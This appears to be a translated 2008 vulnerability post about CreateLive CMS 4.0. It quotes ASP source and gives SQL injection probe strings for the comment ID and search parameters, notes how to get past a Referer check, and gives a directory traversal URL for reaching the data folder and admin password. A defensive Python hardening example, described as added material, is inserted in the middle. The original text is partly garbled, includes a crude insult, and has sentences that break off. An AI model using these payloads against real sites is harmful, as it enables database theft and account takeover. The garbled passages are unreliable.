CreateLive CMS Version 4.0 0day.doc
by: xiaok q: 391232032.771044833 time: 2008-2-4 02:10
XP SP2, IE7, IIS 5.1......
A tribute to D. S. T you gay, cause Hell-Phantom, the actuator on thin ice, causing the old D, The actuator Doom, causing the group to get help with the culture of the rogue......
Vulnerability one
Source: kingcms\User\User_Comment.asp, parameter CommentID
> sub SaveModify()
>     ......
>     CommentID=Trim(Request("CommentID")) 'injection
>     ......
>     if CommentID="" then
>         FoundErr=True
>         ErrMsg=ErrMsg & "* Add the specified comment ID"
>         Exit sub
>     end if
>     ......
>     if FoundErr=True then exit sub
>     sql="Select * from Cl_Comment where ChannelID=" & ChannelID & " and UserID=" & UserID & " and CommentID=" & CommentID 'injection
>     Set rsComment=Server.CreateObject("Adodb.RecordSet")
>     rsComment.Open sql,Conn,1,3
>     if rsComment.Bof or rsComment.EOF then
>         FoundErr=True
>         ErrMsg=ErrMsg & "* Cannot find the specified comment!"
>     else
>     ......
CommentID goes into the SQL string without any filtering...... Of course, there is a new problem. Source: kingcms\User\inc\Cl_ClsSysTem.asp
> 'Determine whether the submitted information comes from an external source
> Public Function ChkIsOuter()
>     Dim server_v1,server_v2
>     ChkIsOuter=True
>     server_v1=Cstr(Request.ServerVariables("HTTP_REFERER"))
>     server_v2=Cstr(Request.ServerVariables("SERVER_NAME"))
>     If Mid(server_v1,8,len(server_v2))=server_v2 Then ChkIsOuter=False
> End Function
Because of this check, none of the tools can be used; you can only enter the information by hand and then post it. (However, within a few seconds I found another one, because otherwise this article could not have been written......)
Vulnerability two
Most sites require new members to be approved, so you cannot get in directly. This one is a vulnerability in the search.
Look at how it is written. Source: kingcms\User\User_Comment.asp
> SearchContent = Trim(request("SearchContent"))
> ......
> Sub main()
>     ......
>     if SearchContent<>"" then strSql2=strSql2 & " and M.CommentContent like '%" & SearchContent & "%'"
> %'and (select count(*) from admin)>0 and '%'='
> %'and (select count(*) from cl_admin)>0 and '%'='
Then enter these here.
The first statement asks whether there is a table named admin; the answer is
The second statement asks whether there is a table named cl_admin; because cl_admin exists, the answer is
I believe some people will understand. It can only be done by hand......
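The search flaw above and the CommentID flaw under vulnerability one share one cause: request data concatenated into the SQL text. As an added example (not code from the original page or from CreateLive CMS), this Python and SQLite stand-in puts the concatenated LIKE beside a bound-parameter version and a digits-only CommentID check. The table layout, sample rows and function names are constructed for illustration.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the CMS database (SQLite, not the CMS's own)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE Cl_Comment (CommentID INTEGER, UserID INTEGER, CommentContent TEXT);
        CREATE TABLE cl_admin (name TEXT, pwd TEXT);
        INSERT INTO Cl_Comment VALUES (1, 7, 'nice article'), (2, 7, '100% agree');
        INSERT INTO cl_admin VALUES ('admin', 'constructed-hash');
    """)
    return db

def search_concat(db, user_id, text):
    """Same pattern as the page's strSql2: input concatenated into the LIKE."""
    sql = ("SELECT CommentID FROM Cl_Comment WHERE UserID=%d"
           " AND CommentContent LIKE '%%%s%%'" % (user_id, text))
    try:
        return [r[0] for r in db.execute(sql)]
    except sqlite3.OperationalError as exc:
        return "error: %s" % exc  # the error text is itself an answer

def search_bound(db, user_id, text):
    """Hardened: the text is a bound parameter and LIKE wildcards are escaped."""
    for ch in ("\\", "%", "_"):
        text = text.replace(ch, "\\" + ch)
    sql = ("SELECT CommentID FROM Cl_Comment WHERE UserID=?"
           " AND CommentContent LIKE ? ESCAPE '\\'")
    return [r[0] for r in db.execute(sql, (user_id, "%" + text + "%"))]

def parse_comment_id(raw):
    """Hardened CommentID: ASCII digits only, anything else is rejected (None)."""
    raw = (raw or "").strip()
    return int(raw) if raw.isascii() and raw.isdigit() and len(raw) <= 9 else None

if __name__ == "__main__":
    db = make_db()
    for table in ("admin", "cl_admin"):  # the two table names the page asks about
        probe = "%'and (select count(*) from " + table + ")>0 and '%'='"
        print(table, search_concat(db, 7, probe), search_bound(db, 7, probe))
    print(parse_comment_id("12"), parse_comment_id("12 or 1=1"))
```

With concatenation the two inputs give different outcomes (an error for the missing table, every row for the existing one), which is what makes the search usable as a yes/no oracle. With a bound parameter both are plain search text and match nothing.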
Vulnerability three
(You need permission to post articles, and you need to bypass the external-submission check......) Maybe you can't wait any longer; bored, ready to wrap up at 2008-2-4 04:41:07......
Log in as a member, and then access
> /Admin/Admin_Files.asp?action=Main&FileType=select&ChannelID=2&ThisDir=../../Data
You will find a (because I used the admin login, so......) Getting the password is that easy
> if ThisDir<>"" then ThisDir=Replace(ThisDir & "/","//","/")
My hand is cramping, so I will stop writing.
Vulnerability four
The source ships with a release note file; because the log and the admin are not in one database, it has no use value...... Must not Gaiden if Gaiden since you do not made to